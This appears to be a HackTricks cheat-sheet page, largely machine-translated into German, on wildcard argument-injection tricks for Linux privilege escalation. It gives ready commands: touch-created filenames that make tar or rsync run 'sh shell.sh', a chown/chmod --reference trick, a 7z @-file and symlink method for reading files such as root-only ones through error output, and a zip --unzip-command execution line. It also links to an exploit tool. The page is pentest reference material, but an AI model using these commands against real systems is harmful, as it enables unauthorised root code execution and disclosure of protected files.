Wildcards Spare tricks

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

chown, chmod

Sie können angeben, welchen Dateibesitzer und welche Berechtigungen Sie für den Rest der Dateien kopieren möchten

touch "--reference=/my/own/path/filename"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (kombinierter Angriff) More info in https://www.exploit-db.com/papers/33930

Tar

Führen Sie beliebige Befehle aus:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Du kannst dies mit https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (tar-Angriff) ausnutzen. Mehr Informationen unter https://www.exploit-db.com/papers/33930

Rsync

Führe beliebige Befehle aus:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine

touch "-e sh shell.sh"

You can exploit this using https://github.com/localh0t/wildpwn/blob/master/wildpwn.py _(_rsync attack) Mehr Infos in https://www.exploit-db.com/papers/33930

7z

In 7z kann selbst die Verwendung von -- vor * (beachten Sie, dass -- bedeutet, dass die folgenden Eingaben nicht als Parameter behandelt werden können, sondern in diesem Fall nur als Dateipfade) einen beliebigen Fehler verursachen, um eine Datei zu lesen. Wenn also ein Befehl wie der folgende von root ausgeführt wird:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

Und Sie können Dateien in dem Ordner erstellen, in dem dies ausgeführt wird. Sie könnten die Datei @root.txt und die Datei root.txt erstellen, die ein symlink zu der Datei ist, die Sie lesen möchten:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Dann wird 7z, wenn es ausgeführt wird, root.txt als eine Datei behandeln, die die Liste der Dateien enthält, die es komprimieren soll (das zeigt die Existenz von @root.txt an), und wenn 7z root.txt liest, wird es /file/you/want/to/read lesen und da der Inhalt dieser Datei keine Liste von Dateien ist, wird es einen Fehler ausgeben, der den Inhalt zeigt.

Mehr Informationen in den Write-ups der Box CTF von HackTheBox.

Zip

Führe beliebige Befehle aus:

zip name.zip files -T --unzip-command "sh -c whoami"

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstütze HackTricks

Überprüfe die Abonnementpläne!
Tritt der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folge uns auf Twitter 🐦 @hacktricks_live.
Teile Hacking-Tricks, indem du PRs zu den HackTricks und HackTricks Cloud GitHub-Repos einreichst.

PreviousSSH Forward Agent exploitation NextUseful Linux Commands

Last updated 1 month ago